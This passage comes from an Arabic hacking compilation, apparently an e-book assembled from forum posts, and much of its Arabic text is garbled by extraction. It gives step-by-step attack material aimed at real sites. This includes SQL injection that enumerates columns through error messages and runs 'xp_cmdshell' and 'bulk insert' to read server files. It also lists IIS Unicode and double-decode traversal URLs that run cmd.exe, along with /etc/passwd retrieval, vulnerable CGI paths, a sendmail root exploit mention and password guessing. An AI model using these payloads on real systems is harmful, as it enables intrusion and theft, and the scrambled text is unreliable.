... ﺘﻌ ﺮ ف ﻋﻠﯿﻬﺎﺑ ﺮاﻣ ﺞاﻟﻜﺴ ﺮ
ﺘﺘﻬﺎﻟ ﯾﻌﻨﻲﺗ ﺮﺑ، ﻋﻠﯿﻚ ﺟﻌ ﻞﻛ ﻞ ﺣﺴﺎبﻓﻲ ﺳﻄ ﺮ
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-: ﺘ ﺤ ﻖاﻟﺰﯾﺎره ﻗﻊﺗﺴ ﻣﻮا
ﺄرﺷﯿ ﻒﻟﺜﻐ ﺮا ت
www .securiteam.com/exploits/archive.html
ﺄرﺷﯿ ﻒﻟﺜﻐ ﺮا ت
http://www .ussrback.com/
اﻟﻜﺜﯿ ﺮ+ ﺄرﺷﯿ ﻒﺛﻐ ﺮا ت
http://www.secureroot.com/
ﺄرﺷﯿ ﻒﺛﻐ ﺮا ت
http://rootshell.redi.tk/
ﺄرﺷﯿ ﻒﺛﻐ ﺮا ت
١ ٥٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
http://www .ussrback.com/
ﻗﻊﻟﺜﻐ ﺮا تﻣﻮا
www .secureroot.com/category/exploits
ﻗﻊاﻟﻬﺎﻛﯿﻨ ﻖ ﺪﻟﯿ ﻞﻟﻤﻮا
www.hitboss.com/Hacking
ﻣ ﺤ ﺮكﺑ ﺤﺚ ﻻ ﻏﻨﻲ ﻋﻨﻪ
www.undergroundnews.com/resources/s...ound/search.asp
Warez.com-Underground
http://www .warez.com/
Hacking
(ﺘﺎزﻟﻤﻦ ﯾ ﺮﯾﺪاﻟﺒﺪاﯾﻪ)ﻣﻤ
http://www.neworder.box.sk/
Security Search Engine
http://www.bugs2k.com/
insecure
http://www .insecure.org/
</XMP></BODY></HTML>
http://public.www .easynet.co.uk/cgi...ail/formmail.pl
...
١ ٥٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$
اﻟﻜﺎﺗﺐICER :
$$$$$$$$$$
ﺘ ﺮﻣﻪاﻻدوا تاﻟﻤﻄﻠﻮﺑﻪ :ﺷﯿ ﻞاﻛﺎوﻧ ﺖ ...اذاﺑ ﺤﺜ ﺖﻓﻲ ﺟﻮﺟ ﻞ ﺳﻮ فﺗﺠﺪاﻟﻜﺜﯿ ﺮ ﻣﻦاﻟﺸﯿﻠﺰ و ﻃﺒﻌﺎاﻟﻨﺎساﻟﻤ ﺤ
ﺘ ﺮﻛﺐﻟﯿﻨﻜ ﺲاو ﯾﻮﻧﯿﻜ ﺲ وﺗﻌﯿ ﺶ ﺣﯿﺎﺗﻬﺎ وﺗ ﺮﯾﺢ ﻧﻔﺴﻬﺎ...ﻓﻲ ﻧﺎسﺗﺎﻧﯿﻪ ﻣﺎﺗ ﺤﺒ ﺶاﻟﻠﯿﻨﻜ ﺲ )ا ﺣﻤﻤﻤﻢ(ﺑ
ﺘﻌﻤ ﻞاﻻﺗﻨﯿﻦ (: اﻟﺸﯿ ﻞاﻛﺎوﻧ ﺖﻛﻮﯾ ﺲﻟﻬﺎ و ﻣﻤﻜﻦ ﯾﻤﺸﻲ واﻧﺎ ﻋﻦ ﻧﻔﺴﻲ ﻣ ﺶ ﺣﺎﺳ
ﺘﺎﻛﺪواﻧﻪﺑﯿﺴﻤﺢﺑﺎﻟﺒ ﺮاﻣ ﺞاﻻﺳﺎﺳﯿﻪ زي ﺘﻌﻤﻠﻮاﻟﺸﯿ ﻞ ﻻزم ﯾ ﺑ ﺲﺑﺎﻟﻨﺴﺒﻪﻟﻠﻲ ﺣﯿﺴ
nslookup, host, dig, ping, traceroute,telnet, ssh, ftp
واﺳﺎﺳﻲ ﻻزما ل gccﻋﺸﺎنﺗﻌ ﺮ فﺗﻌﻤ ﻞﻛﻮﻣﺒﺎﯾ ﻞ)...ﯾﺎ ﻋﻢ رﻛﺐﻟﯿﻨﻜ ﺲ و رﯾﺢ ﻧﻔﺴﻚ ( و ﻃﺒﻌﺎاﻻدوا ت
دي nmap and netcatوا ﺧ ﺮ ﺣﺎﺟﻪ ﻫﻲاﻻﻛﺴﺒﻠﻮﯾ ﺖ .
*ﺑﻌ ﺾاﻟﻤﻠ ﺤﻮﻇﺎ تاﻟﻬﺎﻣﻪ :
ﻗ ﺶﻛﯿﻔﯿﻪاﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﺘﻼ فﻓﻲاﻻواﻣ ﺮ واﻟﻮﻇﺎﺋ ﻒ ..ﻣ ﺶ ﺣﻨﺎ -١اﻟﺸﯿ ﻞاﻛﺎوﻧ ﺖ ﺷﺒﯿﻪ ﺟﺪاﺑﺎﻟﺪوس ﻣﻊا ﺧ
وا ﺣﺪ ﻻنﻓﯿﻪ ﻣﻮا ﺿﯿﻊﻛﺜﯿ ﺮهاﺗﻜﻠﻤ ﺖ ﻋﻠﯿﻪ.
ﺘﻘﺪم . -٢اداها ل nmapﻫﻲ ﻋﺒﺎره ﻋﻦﺑﻮر ت ﺳﻜﺎﻧ ﺮ ﻣ
ﺘﻠﻨ ﺖ وﺗﻘﻮمﺑ ﺮﻓﻊﺑﯿﺎﻧﺎ تﻟﺴﯿ ﺮﻓﯿ ﺮ ﻣﻌﯿﻦ . -٣ا ل NetCatﻫﻲاداه ﺷﺒﯿﻪﺑﺎﻟ
ﺘﻮﺑﻪﺑﻠﻐﻪاﻟﺴﻲ وﻫﻲﺗﻘﻮمﺑﺎﻋﻄﺎﺋﻚﻛﺎﻓﻪاﻟﺼﻼ ﺣﯿﺎ ت ﺘﺎ تﻫﻲ ﻋﺒﺎره ﻋﻦﺑ ﺮاﻣ ﺞ ﻏﺎﻟﺒﺎﺗﻜﻮن ﻣﻜ -٤اﻻﻛﺴﺒﻠﻮﯾ
ﻗﯿﻬﺎﻓﯿﻦ؟؟؟ ﺘ ﺮ ق ﺟﻬﺎز ﻣﻌﯿﻦ وﺗﻘﻮمﺑﻌﻤ ﻞﻛ ﻞ ﺷﻲ ءاﻧ ﺖﺗ ﺮﯾﺪه ﻣﻤﻜﻦﺗﻼ ﻓﻬﻲﺗﺨ
ﻗﻊﺗﺠﯿﺐ ﻣﻨﻪاﻟ ﺤﺎﺟﺎ ت ﺘ ﺶﻗﻮﻟﻲ واﻧﺎادﯾﻠﻚﻛﺎم ﻣﻮ ﺘﻲ ﻋﻠﻰاﻓﻪ ﻣﻦ ﯾﺸﯿ ﻞ...دور وﻟﻮ ﻣﺎﻟﻘﯿ ﻗﻊاﻟﺴﯿﻜﯿﻮرﯾ ﻣﻮا
دي....
ﻗﻊاﻟﻤﺮﺗﺒﻄﻪﺑﺎﻟﻤﻮ ﺿﻮ ع : *اﻟﻤﻮا
(a) Linux (http://www.slackware.com
(b) Nmap (http://www.insecure.org
(/c) NetCat (http://www.l0pht.com/~weld/netcat
اﻟﺨﻄﻮا ت -:
ﺘﻠﻚ ﻣﻔﯿ ﺶا ﺣﺴﻦ ﻣﻦاﻟﻠﯿﻨﻜ ﺲ ( P:
-١رﻛﺐاﻟﯿﻨﻜ ﺲ و ﺧ ﺶ ﻋﺎﻟﻨ ﺖ )ﻣ ﺶﻗﻠ
ﺘﺎﻟﻲ :ﺘﺒﻌﺎاﻟ
-٢رﻛﺐاﻻداه nmapﻣ
*tar zxvf nmap.tar.gz (١
cd nmap (٢
configure && make && make install/. (٣
١ ٥٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
١ ٥٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
١ ٥٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
١ ٥٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$
اﻟﻜﺎﺗﺐlinuxray :
$$$$$$$$$$$$
ﺘﻬﯿﺔ بﺘﻲﺗﻜﻮن ﺻﻔ ﺤﺎﺗﻬﺎ ﻣﻨ ﻗﻊاﻟ ﺘﻮي ﻋﻠﻰ ﺟﺪاو ل واﻏﻠﺐاﻟﻤﻮا اﻻسﻛﯿﻮا ل ﻫﻲ ﻋﺒﺎرة ﻋﻦﻗﺎﻋﺪﺑﯿﺎﻧﺎ تﺗ ﺤ
ASPﻫﻲ ﺻﻔ ﺤﺎ تﺗﺴ ﺤﺐﺑﯿﺎﻧﺎﺗﻬﺎ ﻣﻦﻗﺎﻋﺪة SQLو ﺻﻔ ﺤﺎ ت ASPﻣﻤﻜﻦانﺗﻜﻮنﻛﻨﺰ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت
ﺘﻨﺼ ﺖ ﻋﻠﻰاﻟﺒﻮر ت ١٤٣٣ ﺘ ﺮا قﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت QLSوﻫﺬا ﻣﺎﺳﻮ فاﺷﯿ ﺮاﻟﯿﻪ ﻻ ﺣﻘﺎ ،و SQLﺗ ﻻﺧ
ﺘﻮي ﺘﻮي ﻋﻠﻰاﻛﺜ ﺮ ﻣﻦﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت وﻛ ﻞﻗﺎﻋﺪةﺑﯿﺎﻧﺎ تﺗ ﺤ اﯾ ﻀﺎ ﻣﺎارﯾﺪانا ﺧﺒ ﺮكﺑﻪانا ل SQLﻗﺪﺗ ﺤ
ﻋﻠﻰ ﻋﺪد ﻣﻦاﻟﺠﺪاو ل ﯾﻤﻜﻦ
ﺘﻮﯾﻬﺎ .ﺘﻰﺗ ﺤ
ﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت SQLواﻟﻌﺪداﻟﻜﺒﯿ ﺮ ﻣﻦاﻟﺒﯿﺎﻧﺎ تاﻟ ﺘﺼﻮرﻛﺒ ﺮانﺗ
١ ٦٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
>%
("Connection.ADODB")CreateObject.Server =Set DB
SQL =DRIVER"Open .DB
؛Developer (R)Microsoft =PPA=sa;PWD=xxx;UID=Server;SERVER
"٦٦٦٦٦٦٦" ،"yaRxuniL_" ،"moe_dbs=xxx;DATABASE=Studio;WSID
<%
-----------------------------------------------------------------
ﺘﺨﺪم ﻫﻮ _yaRxuniL ﻓﻲاﻟﻜﻮداﻟﺴﺎﺑ ﻖﺗ ﺮىاناﺳﻢاﻟﻤﺴ
وﻛﻠﻤﺔاﻟﺴ ﺮﻫﻲ ٦٦٦٦٦٦٦
-----------------------------------------------------------------
اﻟﺸﺊاﻟﻤ ﻀ ﺤﻚاﻧﻪا ﺣﯿﺎﻧﺎاذاﻛﺎن ﻫﻨﺎك ﺧﻄﺄﻓﻲ ﺻﻔ ﺤﺔا ل ASPﻣﺜ ﻞاﻻﺗﻲ :
ﺘﻮي ﻋﻠﻰاﺳﻢ
ﺘﻢﺗﻨﻔﯿﺬﻫﺎ ﻣﻦ ﺟﺎﻧﺐاﻟﻤﻠﻘﻢ وﯾ ﺤ
ﺘﻮي ﻋﻠﻰاواﻣ ﺮ ﯾ
ﺘﺪاد *inc.ﻫﺬا ﻣﻠ ﻒ ﯾ ﺤ
ﺘﻬﻲﺑﺎﻣ ﻫﻨﺎك ﻣﻠ ﻒ ﯾﻨ
ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮور اﻟﻤﺴ
ﻗﻊ .
ﺘﻈ ﺮﻗﻢﺑﺴ ﺤﺐ ﻫﺬااﻟﻤﻠ ﻒ وذﻟﻚﺑﺎ ﺿﺎﻓﺔاﺳﻢاﻟﻤﻠ ﻒﻓﻲ ﻋﻨﻮاناﻟﻤﻮ اذن ﻣﺎذاﺗﻨ
asa.global
asa.global++
asa.global-beforemilion
asa.global-
sql.milion
asa.direct-global
١ ٦١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
htr.+asa.global
١ ٦٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
١ ٦٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐhish_hish :
$$$$$$$$$$$$$
ﺘﺒﺎس :
ﻗﺎ
١ ٦٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺎﻟﻲ
ﻮﻓﻲﺑﻌ ﺾاﻟ ﺤﺎﻻ ت ﯾﻈﻬ ﺮاﻟﺨﻄﺎاﻟ
: ﺘﺒﺎس
ﻗا
ﺘﺨﺪم وﻛﻠﻤﺔﺘ ﺤﻘ ﻖ ﺻﻼ ﺣﯿﺔأﺳﻢاﻟﻤﺴ ﺘﺨﺪﻣﻪﻟﻠ ﺎﻟﻤﺴSQL Query ـ ﻟﻠinject ﻮﻫﻮ ﻣﺎ ﯾﺆﻛﺪأﻣﻜﺎﻧﯿﺔ ﻋﻤ ﻞ
. اﻟﻤ ﺮوراﻟﻤﺪ ﺧﻠﻪ
ﺘﻔﺼﯿ ﻞﺑﺸﻲ ء ﻣﻦاﻟSQL injection ـ ﺘﻜﻠﻢ ﻋﻦاﻟ ﺈذنﻟﻨ
ﺘﺨﺪمﻗﺄﻧﻨﺎﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮوراﻟﻤﺪ ﺧﻠﻪ ﻣﻦاﻟﻤﺴ ﺘﺄﻛﺪ ﻣﻦ ﺻﻼ ﺣﯿﺔاﺳﻢ ﺎﻟﻤﺴﻟﻮﻛﺎنﻟﺪﯾﻨﺎ ﺳﻜ ﺮﺑ ﺖ ﯾﻘﻮمﺑﺎﻟ
ﺘﺎﻟﯿﻪ
ﺘ ﺤﻘ ﻖ ﻣﻨﻬﺎﺑﺎﻟﻄ ﺮﯾﻘﺔ ﺎﻟﺳﻨ
code:
١ ٦٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ـSQL . ﻣﻼ ﺣﻈﻪ :ﯾﺠﺐأن ﯾﻜﻮنﻟﺪﯾﻚ وﻟﻮاﻟﻘﻠﯿ ﻞ ﻣﻦاﻟﻤﻌ ﺮﻓﻪﺑﺄواﻣ ﺮاﻟ
ﺘﻪﺘ ﺤﻘ ﻖ ﻣﻦ ﺻﻼ ﺣﯿﺘﺨﺪمﻓﻲ ﺻﻔ ﺤﺔاﻟ ><field from web formﯾ ﺤ ﻞ ﻣ ﺤﻠﻬﺎ ﻣﺎأد ﺧﻠﻪاﻟﻤﺴ
ﺘﺎﻟﻲ
ـ SQLﺄﺻﺒﺢﺑﺎﻟﺸﻜ ﻞاﻟ ﺘﺨﺪم وﺑﺎﻟﻤﺜ ﻞﻟﻜﻠﻤﺔاﻟﻤ ﺮورﻓﺄنأﻣ ﺮاﻟﺘﻨﺎ ﻋﻨﺪﻣﺎﻗﻤﻨﺎﺑﺈد ﺧﺎ ل 'ﻛﺈﺳﻢ ﻣﺴ
ﻓﻲﺗﺠ ﺮﺑ
:
code:
١ ٦٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
١ ٦٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
/Arabic/Scripts/ar_csd_reply.asp, line 33
ﻮﺑﻬﺎأﺳﻢاﻟﺠﺪو ل وأﯾ ﻀﺎأﺳﻢﺄو ل ﻋ ﻤﻮد
ﺘﻄﯿﻊاﻟ ﺤﺼﻮ ل ﻋﻠﻰاﺳﻤﺎ ءﺑﻘﯿﺔاﻷﻋﻤﺪه ﺑﻌﺪﻫﺎﻟﻨﺴ
group byﺘﺨﺪم ﺳﻨﺴ
ﺘﺎﻟﻲ
ﺑﺎﻟﺸﻜ ﻞاﻟ
--group by cs_isp_user.UserID'
passwdﺑﻌﺪﻫﺎ ﺳﻨ ﺤﺼ ﻞ ﻋﻠﻰ ﻋﻤﻮدﺄﺳﻤﻪ
ﺘﺎﻟﻲ
ﺘﺨﺪﻣﻪﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰاﺳﻢاﻟﻌﻤﻮداﻟﻠﻲ ﯾﻠﯿﻪﺑﺎﻟﺸﻜ ﻞاﻟ ﻓﻨﺴ
--group by cs_isp_user.UserID,cs_isp_user.passwd'
! ﺘﺨﺪم ﺧﺎ ﻃﺊ
ﻮﻧﻜ ﺮر زﯾﺎدةأﺳﻢﻛ ﻞ ﺟﺪو ل ﻣﻊاﻟﻌﻤﻮدﺈﻟﻰأن ﻧ ﺤﺼ ﻞ ﻋﻠﻰ ﺻﻔ ﺤﺔﺗﺨﺒ ﺮﻧﺎﺑﺄنأﺳﻢاﻟﻤﺴ
: ﺘﺒﺎس
ﻗا
: ﺘﺒﺎس
ﻗا
١ ٦٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺒﺎس :
ﻗا
١ ٦٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺒﺎس :
ﻗا
١ ٧٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺒﺎس :
ﻗﺎ
ﺘﺒﺎس :
ﻗا
ﺛ ﺮﻟﻨﺎ
ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮور وﯾﻤﻜﻨﻨﺎﺗﺴﺠﯿ ﻞاﻟﺪ ﺧﻮ لﻟﻠﺼﻔ ﺤﺔ ﺎﻟﻤ ﺤﻤﯿﻪﺑﺪون وﺟﻮدأيأ
ﺣﺼﻠﻨﺎ ﻋﻠﻰأﺳﻢاﻟﻤﺴ
ﻗﻢاﻻﯾﺒﻲﻷ ﺧ ﺮ ﺷﺨ ﺾ
ﺈﻻإذاﻛﺎﻧ ﺖاﻟﺼﻔ ﺤﻪاﻟﻤ ﺤﻤﯿﻪ ﻋﻨﺪاﻟﺪ ﺧﻮ لﻟﻬﺎﺗﻘﻮمﺑﻄﺒﺎﻋﺔﺑﻌ ﺾاﻟﻤﻌﻠﻮﻣﺎ ت ﻣﺜ ﻞ ر
١ ٧١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺨﺪم ﻫﺬا
ﻗﺎمﺑﺎﻟﺪ ﺧﻮ لﺑﺈﺳﻢاﻟﻤﺴ
ﺘﻘﻮمﺑﻪﺑﻨﻔﺴﻚﻋﻨﺪﻫﺎﻓﻜ ﺮﺑﻤﺎ ﺳ
ﺘﺨﺪم
ـ SQL Serverﯾﻌﻤ ﻞ ﻋﻠﻰاﻟﻤﺴ ـ Stored Procedureﺈذاﻛﺎناﻟ ﺘﻔﺎده ﻣﻦاﻟﺘﻄﯿﻊ ﺎﻹﺳ
ﺘﺴﺳ
sa
ﺘﺨﺪاﻣﻬﺎ
ٍﺳ
ـ SQL Serverﺗﻢاﻟﺴﻤﺎ حﻟﻪﺑﺎ ﺘﺨﺪماﻟﺬي ﯾﻌﻤ ﻞ ﻋﻠﯿﻪاﻟ ﺄوإذاﻛﺎناﻟﻤﺴ
ﺘﺎﻟﻲ
ـ Procedureﻓﻬﻲﺑﺎﻟﺸﻜ ﻞاﻟ
ﺘﻔﺎده ﻣﻦأي ﻣﻦ ﻫﺬهاﻟ
أﻣﺎ ﻃ ﺮﯾﻘﺔاﻹﺳ
'exec master..xp_cmdshell 'dir
١ ٧٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺎﻟﻲ
ﺘﻪﺑﺎﻟﺸﻜ ﻞاﻟ
ﺑﻌﺪ ذﻟﻚﺑﺄﻣﻜﺎﻧﻚاﻻنإ ﺿﺎﻓﺔأي ﻣﻠ ﻒ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮﺈﻟﻰ ﻫﺬااﻟﺠﺪو ل وﻣﻦﺛﻢﻗ ﺮاﺋ
'bulk insert M_3 from 'c:\InetPub\wwwroot\login
.asp
ﻮﻟﻘ ﺮاﺋﺔ ﻣﺎﺗﻢ ﻧﺴﺨﻪ ﯾﻤﻜﻨﻚ ذﻟﻚ ﻋﻦ ﻃ ﺮﯾ ﻖ رﺳﺎﺋ ﻞ ﺎﻟﺨﻄﺄاﻟﻠﻲﺗﻜﻠﻤﻨﺎ ﻋﻨﻬﺎﻓﻲاﻟﻤﻮ ﺿﻮ عاﻟﺴﺎﺑ ﻖ
ﺘﻢﺗﻮﻟﯿﺪ ﺮﺳﺎﻟﺔ ﺧﻄﺄﺑﻬﺎ ﻣﺎﺗﻢ ﻧﺴﺨﻪ.... ﺄﺳﻬﻠﻬﺎ ﻫﻮ ﻋﻤ ﻞ unionﺣﯿﺚ ﯾ
١ ٧٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$
اﻟﻜﺎﺗﺐCONIK:
$$$$$$$$$$
ﺘﻬﺎ ؟؟؟
ﺘﺜﻤ ﺮاﻟﺜﻐ ﺮهاذااﻧﺎﻟﻘﯿ
ﺲ -:٢ﻃﯿﺐﻛﯿ ﻒاﻧﺎ ﺎﺳ
ﺘﻪ
ﺘﻮﺑﻪﺑﺎﻟﻐﻪ Cﻮاﻧ
ﺘﺎﺗﻬﺎ ﻣﻜ
ﺘﺸﻔﻮااﻟﺜﻐ ﺮا تﻛﺎﻧ ﺖ ﻧﺴﺒﺔ %٩٩ﻣﻦاﻟﺜﻐ ﺮا تﺗﻜﻮن ﺳﻜ ﺮﺑ ﻗ ﺖ ﻣﺎأﻛ
ـ -:ﻣﻦ وﺟ
ﺘﺎجﻟﻤﻌ ﺮﻓﺔ ﻫﺬهاﻟﻠﻐﻪﺄو ﻋﻠﯿﻚﺗ ﺤﻮﯾﻠﻬﺎ . ﺗﺤ
ﺘﺎ ت
ﻗﻊ ( وﻫﻨﺎكﺄﯾ ﻀﺎ ﺳﯿﻜ ﺮﺑ
ﺘﺎ تﺗﻮﺟﻮدهﻓﻰاﻟﻤﻮ ﺘﻰﺗﻜﻮنﺑﺎﻟﻠﻐﺔ Cﺗﻜﻮن ﺳﯿﻜ ﺮﺑ )ﻣﻼ ﺣﻈﻪ ﻫﺬهاﻟﺜﻐ ﺮا تاﻟ
ﺘﻪ ﻣ ﺮﻛﺐﻟﻮﯾﻨﻜ ﺲ ﻋﻠﺸﺎناﻻواﻣ ﺮ وأﻧﺎأﻧﺼ ﺤﻚ ﺘﻮﺑﺔﺑﺎﻟﻠﻐﻪ perlﻮﻻزمﻓﻰﻫﺬهاﻟ ﺤﺎﻟﺔﺗﻜﻮناﻧ أ ﺧ ﺮى ﻣﻜ
ﺗ ﺮﻛﺐlinux Redhat 7.3
ﺘﻪأرﻛﺐاﻟﻤﺎﻧﺪرﯾﻚ وﻻاﻟ ﺮﯾﺪﻫﺎ تﻗﺎ لﻟﻰاﻧﻪ ﺘ ﺮﻟﻤﻦاﻧﺎ ﺳﺄﻟ ﻷﻧﻪأﻓ ﻀ ﻞ ﻣﻦاﻟﻤﺎﻧﺪرﯾﻚ وأذﻛ ﺮاﻧﻪاﻷ خﺑﻼكﻫﺎﻧ
اﻟﻤﺎﻧﺪرﯾﻚ ﺻﻮرة ﻣﺒﺴﻄﻪ
ﻗﻮى وﺟﺰاةا ﷲ ﺧﯿ ﺮ ﻋﻠﻰ ﻫﺬهاﻟﻨﺼﯿ ﺤﺔ ﻧ ﺮﺟﻊﻟﻠﻤﻮ ﺿﻮ ع ﺘﻄﻮر ﻮأﻧﻪاﻟ ﺮﯾﺪﻫﺎ تأﻟﻠ ﺮﯾﺪﻫﺎ تﺑ ﺲ ﻏﯿ ﺮﻗﺎﺑﻠﻪﻟﻠ
./file.pl
ﺗﻌﻄﯿﻚﻫﺬهاﻟ ﺮﺳﺎﻟﺔ
Access Denied----ﻫﺬهاﻟ ﺮﺳﺎﻟﺔﺗﻮ ﺿﺢ ﻋﺪماﻟﻤﻮاﻓﻘﻪ
ﺘﻪاﻻﻣ ﺮ ﻫﺬه
ﺘﺎﺑ
ﺄذا ﺻﺎرﻟﻚﻛﺬاﻛ ﻞ ﻣﺎ ﻋﻠﯿﻚ ﺳﻮىﻛ
ﺘﺐأﺳﻢ ﺎﻟﻤﻠ ﻒ
ﺘﻪﺗﻜ
chmod +x Conik.pl-----ﻻ ﺣﻆ ﻣﻜﺎنﻛﻮﻧﯿﻚاﻧ
١ ٧٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
./Conik.c
ﺘﺸﻐﯿ ﻞ واﻟﯿﻮزر واﻟﺒﺎﺳﻮردﻻ ﺣﻆاﻧﻪ ﻃﻠﺐ ﻣﻤﻨﺎاﻟﻤﻠﻘﻢﻟﻠﺒ ﺮﻧﺎﻣ ﺞ Sendemailﻮﻛﻤﺎن ﻃﻠﺐ ﻧﻈﺎماﻟ
ـExan nofer ﺘﻨﻔﯿﺬ ﺎﻟ
ﺘﯿﺎز Rootﺑﺴﺒﺐﻗﯿﺎماﻟﺒ ﺮﻧﺎﻣ ﺞﺑ
ﻮﺑﻌﺪ ﻫﺬهﻛﻠﻪاﻟﺒ ﺮﻧﺎﻣ ﺞأﻋﻄﺎﻧﺎأﻣ
ﻣﻼ ﺣﻈﺔ ﻻﺗ ﻀﻦأﻧﻪﻟﻤﻦاﻧﺎ ﺣﻄﯿ ﺖاﻟﺒ ﺮﻧﺎﻣ ﺞ XXX. SENDMAILﺑﺪون ﺎى ﺳﺒﺐأﻧﺎ ﺣﻄﯿ ﺖﻟﻚ ﻫﺬه
اﻟﻤﺜﺎ ل ﻵﻧﻪ ﻫﻨﺎكﺛﻐ ﺮهﻓﻰ ﻫﺬهاﻟﺒ ﺮﻧﺎﻣ ﺞ ﻮرا حأﺷ ﺮ ﺣﻬﺎﻟﻚأن ﺷﺎ ءا ﷲﺗﻌﺎﻟﻰﺑ ﺲﻛﺎنﺑﺪىﺗ ﺤﻔﻆاﻷﺳﻢ ﻫﺬه
ﺲ-:٦أﯾ ﺶﻫﻲﻗﻮ ل ﯾﺎ Conikﺗ ﺮى ﻫﺬهاﻟﻄ ﺮﯾﻘﺔ ﯾﺒﻐﺎﻟﻬﺎ ﻧﻈﺎمﺗﺸﻐﯿ ﻞ وﻛﻤﺎنﻟﻐﻪ Cﻮ Perl؟
ﺘﺼﻔﺢ وﺗﻮﺻ ﻞاﻟﻰﻗﻊ ﻋﺒ ﺮاﻟﻤ
ﺘﻪﺗﺸﻮ ف ﻣﻌﻠﻮﻣﺎ تاﻟﻤﻮ ﺘﺼﻔﺢ ﯾﻌﻨﻰاﻧ ﺘﺨﺪم ﻣﻦ ﺧﻼ لاﻟﻤ ـ-:ﻓﻲﺗﻐ ﺮا تﺗﺴ ﺟ
ﻣﻠ ﻒاﻟﺒﺎﺳﻮردا ت ﻣﻦ ﻫﺬهاﻟﻄ ﺮﯾﻘﻪ
١ ٧٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%
35%63../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe
?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32
/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste
m32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di
r+c:\
/cgi-
bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd
.exe?/c+dir+c:\
/cgi-bin/view-source?../../../../../../../etc/passwd
/cgi-bin/phf
/cgi-bin/wwwboard.pl
/cgi-bin/AT-admin.cgi
١ ٧٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
/cgi-bin/info2www
/cgi-bin/environ.cgi
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel
...exploits, rootkits, ProFTPD, WU-FTPD,
١ ٧٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐViagra 2001:
$$$$$$$$$$$$$$
who
rwho
finger
ﺘﺨ ﺮجﻛﻠﻤﺔ ﺎﻟﺴ ﺮ ﻣﻦﺘﺨﺪﻣﯿﻦﻟﻠﻨﻈﺎم ﻮﺑﺬﻟﻚ ﯾﻤﻜﻦ ﺎنﺗﺴ ﺘﻌ ﺮ ض ﺎﺳﻤﺎ ء ﺎﻟﻤﺴ
ﺘﻔﯿﺪ ﻣﻦﻫﺬه ﺎﻷواﻣ ﺮﺑﺄﻧﻚﺗﺴ
ﻮﺗﺴ
ﺘﻌﻤ ﻞﻛﻠﻤﺔ ﺳ ﺮ ﻣﺸﺎﺑﻬﺔﺗﻘ ﺮﯾﺒﺎﻷﺳﻤﻪ ﻣﺜ ﻞ :.ﺘﺨﺪﻣﯿﻦ ﯾﺴﻧﻔ ﺲ ﺎﻻﺳﻢ ﻮذﻟﻚﻷنﺑﻌ ﺾ ﺎﻟﻤﺴ
username : Black
password : Black2
١ ٧٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
